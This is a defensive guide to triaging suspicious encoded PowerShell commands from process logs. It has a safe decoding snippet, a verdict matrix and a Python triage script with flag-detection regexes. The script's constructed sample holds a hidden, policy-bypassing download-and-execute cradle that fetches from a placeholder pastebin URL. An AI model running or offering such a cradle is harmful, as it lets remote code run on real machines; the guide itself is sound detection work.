Triaging Suspicious PowerShell

An encoded PowerShell command in your process logs is not automatically malicious, but it always deserves a closer look. Here is how to triage one calmly.
What raises the flag
Certain flag combinations are unusual for a legitimate script and common for tradecraft:

- `-EncodedCommand` (base64 payloads)
- `-WindowStyle Hidden`
- `-NonInteractive`
- `-ExecutionPolicy Bypass`

powershell.exe also accepts its documented short forms (`-enc`, `-e`, `-w hidden`, `-noni`, `-ep bypass`) and any other unambiguous prefix, so match on the abbreviations as well as the full names; tradecraft rarely spells them out.
Decoding a payload is reading, not running. Decode in an isolated environment and never paste an unknown command back into a live shell.
Decoding the payload
The `-EncodedCommand` argument is just base64 wrapping UTF-16LE text, so decode it as Unicode; decoding as UTF-8 leaves a NUL between every character. Decode it safely:

```powershell
# Placeholder value for illustration; it decodes to "$c". Paste the captured
# -EncodedCommand string here, then read the output. Do not Invoke-Expression it.
$enc = 'JABjAA=='
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc))
```
Quick verdict matrix
| Observation | Leans benign | Leans malicious |
|---|---|---|
| Signed parent process | ✓ | |
| Downloads from a raw paste site | | ✓ |
| Runs from a user Temp directory | | ✓ |
| Part of a known deployment tool | ✓ | |
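The whole workflow, flag spotting, decoding and the verdict matrix, as one added example that is not code from the original page. It is written in Python rather than PowerShell on purpose: the decode then happens outside any PowerShell host, so there is no shell for the payload to fall into. The regexes cover the full flag names plus the short forms powershell.exe documents (other unambiguous prefixes are not covered), the paste-site and Temp-directory indicators are a starter list, and the command lines at the bottom are constructed samples with a placeholder pastebin path, not captures from a real case.

```python
"""Offline triage of an encoded PowerShell command line taken from process logs.

Added example, not code from the original page. It only reads and decodes the
captured command line; nothing in it executes PowerShell.
"""
import base64
import binascii
import re
from typing import Optional

# The four flags the page calls out, matched by full name and by the short
# forms powershell.exe documents (-e/-ec/-enc, -w, -noni, -ep/-ex). PowerShell
# also accepts other unambiguous prefixes, which this starter set ignores.
SUSPICIOUS_FLAGS = {
    "EncodedCommand": re.compile(
        r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+[\"']?[A-Za-z0-9+/=]+", re.I),
    "WindowStyle Hidden": re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+h\w*", re.I),
    "NonInteractive": re.compile(r"(?<![\w-])-noni\w*", re.I),
    "ExecutionPolicy Bypass": re.compile(r"(?<![\w-])-e(?:x\w*|p)\s+bypass", re.I),
}
_ENCODED_VALUE = re.compile(
    r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]+)", re.I)

# Starter indicators for two rows of the verdict matrix (assumed, extend to taste).
PASTE_SITE = re.compile(r"https?://(?:[\w-]+\.)*pastebin\.com/raw/", re.I)
USER_TEMP_DIR = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 value passed to -EncodedCommand (any short form), or None."""
    match = _ENCODED_VALUE.search(cmdline)
    return match.group(1) if match else None


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand value: base64 wrapping UTF-16LE text.

    Re-adds padding a log pipeline may have stripped and rejects non-base64
    input, so a garbled log line fails loudly instead of decoding to junk.
    """
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not a valid -EncodedCommand value: {exc}") from None
    # A truncated line can leave an odd byte count; replace rather than crash.
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline: str, parent_signed: bool, deployment_tool: bool) -> dict:
    """Apply the verdict matrix to one process-log entry.

    parent_signed and deployment_tool come from the log's parent-process
    context; the other rows are derived from the command line and payload.
    """
    flags = [name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(cmdline)]
    b64 = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(b64) if b64 else ""
    text = cmdline + "\n" + decoded  # search both the wrapper and the payload

    malicious = list(flags)
    if PASTE_SITE.search(text):
        malicious.append("downloads from raw paste site")
    if USER_TEMP_DIR.search(text):
        malicious.append("runs from a user Temp directory")
    benign = []
    if parent_signed:
        benign.append("signed parent process")
    if deployment_tool:
        benign.append("part of a known deployment tool")

    # Weigh the columns together: no malicious signal leans benign, a clear
    # majority leans malicious, anything in between needs an analyst's read.
    if not malicious:
        lean = "benign"
    elif len(malicious) > len(benign):
        lean = "malicious"
    else:
        lean = "review"
    return {"flags": flags, "decoded": decoded, "malicious": malicious,
            "benign": benign, "lean": lean}


# Constructed sample: a payload encoded the way PowerShell expects (UTF-16LE,
# then base64) behind the short-form flags seen in real tradecraft. The
# pastebin path is a placeholder, not a real paste.
SAMPLE_PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
                  "'https://pastebin.com/raw/placeholder')")
SAMPLE_CMDLINE = ("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
                  + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode())
# Constructed benign entry for comparison: a vendor script under Program Files.
BENIGN_CMDLINE = r'powershell.exe -NoProfile -File "C:\Program Files\Vendor\deploy.ps1"'

if __name__ == "__main__":
    for line, signed, tool in ((SAMPLE_CMDLINE, False, False), (BENIGN_CMDLINE, True, True)):
        result = triage(line, parent_signed=signed, deployment_tool=tool)
        print(f"lean={result['lean']} flags={result['flags']}")
        if result["decoded"]:
            print("decoded:", result["decoded"])
```

The returned dict is what goes into the case notes: the decoded text, every signal that fired, and the lean. The "review" outcome is deliberate; when benign and malicious signals balance, the tool should hand the decision to a person rather than pick a side.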
Weigh the signals together, not in isolation. Document the decoded command and the verdict in the case notes — future you, and the next analyst, will thank you.